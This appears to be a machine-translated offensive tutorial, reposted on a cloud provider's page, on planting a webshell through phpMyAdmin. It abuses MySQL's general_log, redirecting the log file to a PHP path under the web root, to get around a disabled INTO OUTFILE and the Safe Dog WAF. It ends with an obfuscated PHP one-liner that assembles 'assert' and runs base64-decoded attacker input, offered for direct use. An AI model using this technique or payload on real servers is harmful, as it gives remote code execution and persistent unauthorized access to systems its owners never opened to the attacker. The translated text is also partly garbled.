phpMyAdmin New Posture Getshell

Source: Internet
Author: User
Tags phpmyadmin

Narrator: How do I getshell in a scenario with a WAF and an into outfile in MySQL?

Tilt rotation
Email:[email protected]
Submission Contact: [Email protected]

The first environment is as follows:

    • Os:windows 2003
    • Waf:safe Dog 4.0 Official edition
    • phpmyadmin:4.7 (many can)
    • mysql:5.5+
    • php:5.3
    • apache:2.x

is currently into outfile disabled, and WAF is also intercepted when writing to a file.
So we're trying to getshell through a big hole in the brain.
(必须是mysql root权限)

After logging in to phpMyAdmin, view the global variables:
Found itgeneral log file

Here is the log that stores each SQL statement execution (including the SQL statement itself)

However general log , the variable must be on state, which means enable.

At this point we turn general log ON on and then go to change general log file the address to our webshell absolute path.

At each change general log file , MySQL will determine if the log file exists and will be created automatically if it does not exist.

The file is now created, and the file contents hold the log information for the last SQL statement.

MySQLa, Version: 5.5.53 (MySQL Community Server (GPL)). started with:
TCP Port: 3306, Named Pipe: MySQL
Time Id Command Argument
121 QuerySHOW GLOBAL VARIABLES WHERE Variable_name="general_log_file"
121 Quit

Next, we directly query SQL, each sentence will be written to this shell.php

Because of the WAF, we run Webshell in the form of a remote inclusion.
In our remote address, put the function name, let the server side access it, and then load into memory, go directly to call this function, and then to receive our submitted PHP code.

Please see an article about Chopper-free killing.

The following is attached to a SQL query to avoid the shell statement, so that you can encounter such situations directly use:

SELECT "<?php $p = array(‘f‘=>‘a‘,‘pffff‘=>‘s‘,‘e‘=>‘fffff‘,‘lfaaaa‘=>‘r‘,‘nnnnn‘=>‘t‘);$a = array_keys($p);$_=$p[‘pffff‘].$p[‘pffff‘].$a[2];$_= ‘a‘.$_.‘rt‘;$_(base64_decode($_REQUEST[‘username‘]));?>"

There is no interception on this side:

Article on to here, these days more busy, have not how to update, thank you all have been support!

phpMyAdmin New Posture Getshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.